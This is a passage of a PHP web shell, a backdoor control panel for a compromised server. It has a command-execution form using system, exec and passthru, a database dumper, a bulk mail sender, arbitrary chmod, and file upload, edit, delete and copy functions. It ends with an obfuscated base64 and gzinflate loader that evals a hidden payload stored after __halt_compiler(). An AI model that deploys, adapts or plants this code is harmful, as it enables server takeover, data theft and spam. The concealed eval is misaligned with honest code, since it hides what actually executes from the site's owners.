1103 while ($row = mysql_fetch_row($sql)) {
1104 foreach ($row as $j => $k) {
1105 $row[$j] = "'".mysql_escape_string($k)."'";
1106 }
1107 write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
1108 }
1109 }
1110}
1111if ($method=='sql'){
1112fclose ($fp);
1113}else{
1114gzclose($fp);}
1115header("Content-Disposition: attachment; filename=" . $file);
1116header("Content-Type: application/download");
1117header("Content-Length: " . filesize($file));
1118flush();
1119
1120$fp = fopen($file, "r");
1121while (!feof($fp))
1122{
1123 echo fread($fp, 65536);
1124 flush();
1125}
1126fclose($fp);
1127}
1128
1129if ($_GET['do']=="mail"){
1130echo $head.'
1131<form method=post action="'.$me.'">
1132<p align="center">
1133Address : <input type="text" name="admail" size="50"><br><br>Subject : <input type="text" name="submail" size="50"><br><br><textarea cols=70 rows=18 name=textmail>Text</textarea><br><br>Number For Send : <input type="text" name="numail" size="5" value=1><input type=submit value=Send!></form>'.$end;exit;}
1134if ($_POST['admail'] && $_POST['submail'] ){
1135for($mi=0;$mi<intval($_POST['numail']);$mi++){
1136mail($_POST['admail'], $_POST['submail'], $_POST['textmail']);}
1137}
1138if($_GET['do']=="db"){
1139echo $head;sqlclienT();echo $end;
1140exit;
1141}
1142if($_REQUEST['file2ch'] && $_REQUEST['chmodnow']){
1143$chmodnum2=$_REQUEST['chmodnow'];
1144chmod($_REQUEST['file2ch'],"0".$chmodnum2);
1145}
1146if($_GET['do']=="chmod"){
1147echo $head.$formg.$nowaddress."<p align=center><b>Chmod</b><br><input size=50 name=file2ch value='".$_REQUEST['address'].$_REQUEST['filename']."'> To <input name=chmodnow size=1 value=777><br><input type=submit value=Set></form>".$end;exit;
1148
1149}
1150/* if($_GET['do']=="edit"){
1151if($_GET['filename']=="dir"){
1152if(is_readable($_GET['address'])){
1153chdir($_GET['address']);}else{alert("Permission Denied !");}
1154
1155}} */
1156$araddresss=explode($slash,getcwd());
1157$matharrayy=count($araddresss)-1;
1158$addr1backk=str_replace($araddresss[$matharrayy],"",$araddresss);
1159for($countback=0;$countback<count($addr1backk);$countback++){
1160$arraybacke[$countback]=$slash.$addr1backk[$countback];
1161$backdirunixx=$backdirunixx.$slash.$addr1backk[$countback];
1162}
1163if ($slash=="\\"){
1164$countback=null;
1165$backdirwin=null;
1166for($countback=1;$countback<count($addr1backk);$countback++){
1167$backdirwin=$backdirwin."\\".$addr1backk[$countback];}
1168$backdirwin=$addr1backk[0].$backdirwin;
1169$backaddresss=$backdirwin;
1170}else{
1171$countback=null;
1172$backdirwin=null;
1173for($countback=1;$countback<count($addr1backk);$countback++){
1174$backdirwin=$backdirwin."/".$addr1backk[$countback];}
1175$backdirwin=$addr1backk[0].$backdirwin;
1176$backaddresss=$backdirwin;
1177$backaddresss=str_replace("\\","/",$backaddresss);
1178}
1179function calc_dir_size($path)
1180{
1181$size = 0;
1182if ($handle = opendir($path))
1183{
1184while (false !== ($entry = readdir($handle)))
1185{
1186$current_path = $path . '/' . $entry;
1187if ($entry != '.' && $entry != '..' && !is_link($current_path))
1188{
1189if (is_file($current_path))
1190$size += filesize($current_path);
1191elseif (is_dir($current_path))
1192$size = calc_dir_size($current_path);
1193}
1194}
1195}
1196closedir($handle);
1197return $size;
1198}
1199function openf($parsef){
1200global $basep,$slash;
1201
1202if(strlen(strpos(getcwd(),$basep))>=1){
1203$rr=str_replace($basep,"",getcwd());
1204$rr=str_replace("\\","/",$rr);
1205$diropen='<a href="'.$rr."/".$parsef.'">'.$parsef.'</a>';
1206}else{
1207$diropen='<a href="?do=edit&address='.getcwd().$slash.'&filename='.$parsef.'">'.$parsef.'</a>';
1208}
1209return $diropen;
1210}
1211if ($_GET['address']){$ifget=$_GET['address'];}if($_POST['address']){$ifget=$_POST['address'];}
1212if($cwd==''){$cwd=getcwd();}$nowaddress='<input type=hidden name=address value="'.$cwd.'">';
1213$ad=getcwd();
1214$hand=opendir("$ad");
1215$coi=0;
1216$coi2=0;
1217
1218while (false !== ($fileee = readdir($hand))) {
1219
1220
1221 if ($fileee != "." && $fileee != "..") {
1222 if (filetype($fileee)=="dir"){
1223 if ($coi %2){
1224$colort='"#e7e3de"';
1225}else{
1226$colort='"#e4e1de"';
1227
1228}
1229$coi++;
1230$fil=$fil.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 0px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="1" dir="ltr">
1231<tr onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$oo.'\';"><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><img src="data:image/png;base64,' .$picdir. '" /> <a href="?address='.$cwd.$slash.$fileee.$slash.'">'.$fileee.'</b></span></td>
1232<td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($fileee)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt">'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"><a href="?do=down&type=dir&address='.$cwd.$slash.'&dirname='.$fileee.'">DL</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=rename&address='.$cwd.$slash.'&filename='.$fileee.'">Ren</a></td>
1233<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=delete&type=dir&address='.$cwd.$slash.'&filename='.$fileee.'">Del</a></td></tr></table>'
1234;}
1235else{
1236
1237 if ($coi2 %2){
1238$colort='"#e7e3de"';
1239}else{
1240$colort='"#e4e1de"';
1241}
1242
1243$coi2++;
1244$file=$file.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 0px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
1245<tr onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$oo.'\';"><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><img src="data:image/png;base64,' .$picfile. '" /> '.openf($fileee).'</span></td>
1246<td valign="top" height="19" width="80"><font face="Tahoma" style="font-size: 9pt">'.sizee(filesize($fileee)).'</td><td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($fileee)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt">'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=edit&address='.$cwd.$slash.'&filename='.$fileee.'">Edit</a></td><td valign="top" height="19" width="23"><font face="Tahoma" style="font-size: 9pt"><a href="?do=down&type=file&address='.$cwd.$slash.'&filename='.$fileee.'">DL</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=rename&address='.$cwd.$slash.'&filename='.$fileee.'">Ren</a></td>
1247<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=delete&type=file&address='.$cwd.$slash.'&filename='.$fileee.'">Del</a></td></tr></table>'
1248;}
1249}
1250}
1251echo $head.'
1252<font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
1253<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
1254</tr></table>'.$fil.$file.'</table>
1255<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5">
1256<tr>
1257<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
1258<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Command Execute : </font></td>
1259<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input type=hidden name=address value='.getcwd().'><input name=command value=id size=50><input type=hidden name=do value=cmd size=50> <select name=execmethod>
1260 <option value="system">System</option> <option value="exec">Exec</option> <option value="passthru">Passthru</option>
1261</select> <input type=submit value="Execute"></form></td></tr>
1262<tr>
1263<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
1264<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Dir : </font></td>
1265<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().$slash.' size=50>
1266<input type=submit value=Change></form></td></tr>
1267<tr>
1268<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
1269<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Create Dir : </font></td>
1270<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=cdirname value='.getcwd().$slash.' size=50><input type=hidden name=address value='.getcwd().'><input type=submit value=" Create "></form></td></tr>
1271<tr>
1272<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
1273<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Create File : </font></td>
1274<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=cfilename value='.getcwd().$slash.' size=50> <input type=hidden name=address value='.getcwd().'><input type=submit value=" Create "></form></td></tr>
1275<tr></form>
1276<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
1277<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Upload : </font></td>
1278<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
1279<font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee > <input type=hidden name=address value='.getcwd().'>
1280<input type=submit value=Upload /></form></td></tr>
1281<tr>
1282<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
1283<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Copy File : </font></td>
1284<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input size=20 name=copyname><input type=hidden name=address value="'.getcwd().'"> To <input size=40 name=cpyto value="'.getcwd().$slash.'"> <input type=submit value =Copy></form></td></tr>
1285'.$end;
1286?>
1287<?php /*** PHP encode ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5jdGlvbiBZaXVuSVVZNzZiQmh1aE5ZSU84KCRnLCRiPTApeyRhPWltcGxvZGUoIlxuIiwkZyk7JGQ9YXJyYXkoNjU1LDIzNiw0MCk7aWYoJGI9PTApICRmPXN1YnN0cigkYSwkZFswXSwkZFsxXSk7ZWxzZWlmKCRiPT0xKSAkZj1zdWJzdHIoJGEsJGRbMF0rJGRbMV0sJGRbMl0pO2Vsc2UgJGY9dHJpbShzdWJzdHIoJGEsJGRbMF0rJGRbMV0rJGRbMl0pKTtyZXR1cm4oJGYpO319"));eval(base64_decode(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH)));eval(ZsldkfhGYU87iyihdfsow(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,2),YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,1)));__halt_compiler();aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=bc6f778d86354b75a7352aae400838e41067bed1dZFvS8MwEIffC36HIwzmQNoX66uNgsV2VFj/0NTJEClxBns0aUoTB/rpTbvBhtRXOXI8D3e/c124vZk1KLlPDkpL1NXSe6iVkQyFc1CSrG3/nWmBjU86r/N+gNZcCNiqT9gtx3bDTG/5UOlvBnslvmAFxJlVNCp2UfE6D7PH5yRKy6rIsnL+5pC+vXCOTyjvj7yH4ENi+wc9vVUQJk/p/yRqwQ1K0KgNlzjtoNmmfAmKaEpz2gjbxqK1Md3KdScMaZAM9OU/j3NbbzcTyuAoWMtaoGj4MA9cYXFZ5lWc0asshrjvxjvcwzluW4yyxfoX